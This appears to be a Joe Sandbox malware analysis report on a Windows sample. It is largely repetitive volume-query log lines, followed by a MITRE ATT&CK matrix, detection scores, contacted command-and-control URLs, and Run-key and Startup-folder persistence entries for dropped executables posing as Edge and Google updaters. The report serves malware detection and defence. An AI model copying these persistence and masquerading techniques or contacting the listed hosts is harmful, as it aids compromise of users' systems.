Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	121 Registry Run Keys / Startup Folder	11 Process Injection	1 Masquerading	OS Credential Dumping	1 Query Registry	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	121 Registry Run Keys / Startup Folder	1 Disable or Modify Tools	LSASS Memory	111 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	41 Virtualization/Sandbox Evasion	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	41 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	1 System Network Configuration Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Timestomp	DCSync	2 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	12 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Link
file.exe	18%	ReversingLabs
file.exe	24%	Virustotal	Browse
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	18%	ReversingLabs
C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	24%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	18%	ReversingLabs
C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	24%	Virustotal	Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
api.ipify.org	0%	Virustotal	Browse
yalubluseks.eu	2%	Virustotal	Browse
57.122.6.0.in-addr.arpa	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://sectigo.com/CPS0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	0%	Virustotal		Browse
https://yalubluseks.eu/t	0%	Virustotal		Browse
http://api.ipify.org/	0%	Virustotal		Browse
https://yalubluseks.eu	3%	Virustotal		Browse
https://yalubluseks.eu/get_update.php	1%	Virustotal		Browse
https://yalubluseks.eu/get_update.phpT	3%	Virustotal		Browse
https://yalubluseks.eu/	3%	Virustotal		Browse
https://yalubluseks.eu/receive.php	0%	Virustotal		Browse
http://yalubluseks.eu	2%	Virustotal		Browse
http://api.ipify.org	0%	Virustotal		Browse
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	0%	Virustotal		Browse
https://yalubluseks.eu/get_updatX	7%	Virustotal		Browse
https://yalubluseks.eu/get_file.php	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.ipify.org	172.67.74.152	true	false	0%, Virustotal, Browse	unknown
yalubluseks.eu	104.21.54.163	true	false	2%, Virustotal, Browse	unknown
57.122.6.0.in-addr.arpa	unknown	unknown	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://api.ipify.org/	false	0%, Virustotal, Browse	unknown
https://yalubluseks.eu/get_update.php	false	1%, Virustotal, Browse	unknown
https://yalubluseks.eu/receive.php	false	0%, Virustotal, Browse	unknown
https://yalubluseks.eu/get_file.php	false	0%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://yalubluseks.eu/t	LKMService.exe, 00000002.00000002.4661088450.00000000023B1000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://yalubluseks.eud	LKMService.exe, 00000002.00000002.4661088450.000000000251E000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4661088450.0000000002647000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4661088450.00000000028E7000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://api.ipify.orgD	LKMService.exe, 00000002.00000002.4661088450.0000000002647000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4661088450.00000000028E7000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://api.ipify.orgd	LKMService.exe, 00000002.00000002.4661088450.0000000002647000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4661088450.00000000028E7000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://sectigo.com/CPS0	file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.dr	false	URL Reputation: safe	unknown
https://yalubluseks.euD	LKMService.exe, 00000002.00000002.4661088450.000000000251E000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4661088450.0000000002647000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4661088450.00000000028E7000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://ocsp.sectigo.com0	file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.dr	false	URL Reputation: safe	unknown
https://yalubluseks.eu/get_filT	LKMService.exe, 00000002.00000002.4661088450.00000000028E7000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://yalubluseks.eu/receiPt	LKMService.exe, 00000002.00000002.4661088450.00000000028E7000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://yalubluseks.eu/get_update.phpT	LKMService.exe, 00000002.00000002.4661088450.000000000251E000.00000004.00000800.00020000.00000000.sdmp	false	3%, Virustotal, Browse	unknown
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.dr	false	0%, Virustotal, Browse	unknown
https://pidgin.im0	file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.dr	false		unknown
https://yalubluseks.eu	LKMService.exe, 00000002.00000002.4661088450.00000000023B1000.00000004.00000800.00020000.00000000.sdmp	false	3%, Virustotal, Browse	unknown
https://yalubluseks.eu/get_updatX	LKMService.exe, 00000002.00000002.4661088450.0000000002647000.00000004.00000800.00020000.00000000.sdmp	false	7%, Virustotal, Browse	unknown
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.dr	false	0%, Virustotal, Browse	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	LKMService.exe, 00000002.00000002.4661088450.00000000023B1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://yalubluseks.eu/	file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.dr	false	3%, Virustotal, Browse	unknown
http://yalubluseks.eu	LKMService.exe, 00000002.00000002.4661088450.000000000251E000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4661088450.0000000002647000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000002.00000002.4661088450.00000000028E7000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse	unknown
http://api.ipify.org	file.exe, LKMService.exe.0.dr, GoogleUpdater.exe.2.dr	false	0%, Virustotal, Browse	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.26.12.205	unknown	United States	13335	CLOUDFLARENETUS	false
104.21.54.163	yalubluseks.eu	United States	13335	CLOUDFLARENETUS	false
172.67.74.152	api.ipify.org	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1524651
Start date and time:	2024-10-03 03:25:11 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	file.exe
Detection:	MAL
Classification:	mal88.winEXE@13/88@6/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 156 Number of non-executed functions: 22
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 104.208.16.94, 52.168.117.172, 20.189.173.20, 20.42.73.29
Excluded domains from analysis (whitelisted): client.wns.windows.com, onedsblobprdeus07.eastus.cloudapp.azure.com, ocsp.digicert.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, d.3.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.8.0.4.0.0.3.0.1.3.0.6.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
03:26:14	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run LKMService_047c5762224547e8b0906f5148be419e C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
03:26:23	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run LKMService_773ee3bb9e0f4071afc0e6a7986206d0 C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
03:26:31	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run LKMService_047c5762224547e8b0906f5148be419e C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
03:26:39	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run LKMService_773ee3bb9e0f4071afc0e6a7986206d0 C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
03:26:47	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_acbb346df900467ebd8c2c0ce13844f9.lnk
03:27:06	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_f5a844d131a542409d15c7be5595addc.lnk
03:27:19	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_284cd24aa4e1493cb8422375a300e535.lnk
03:27:32	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_0792a7c0e50544d6a4b11823b693efec.lnk
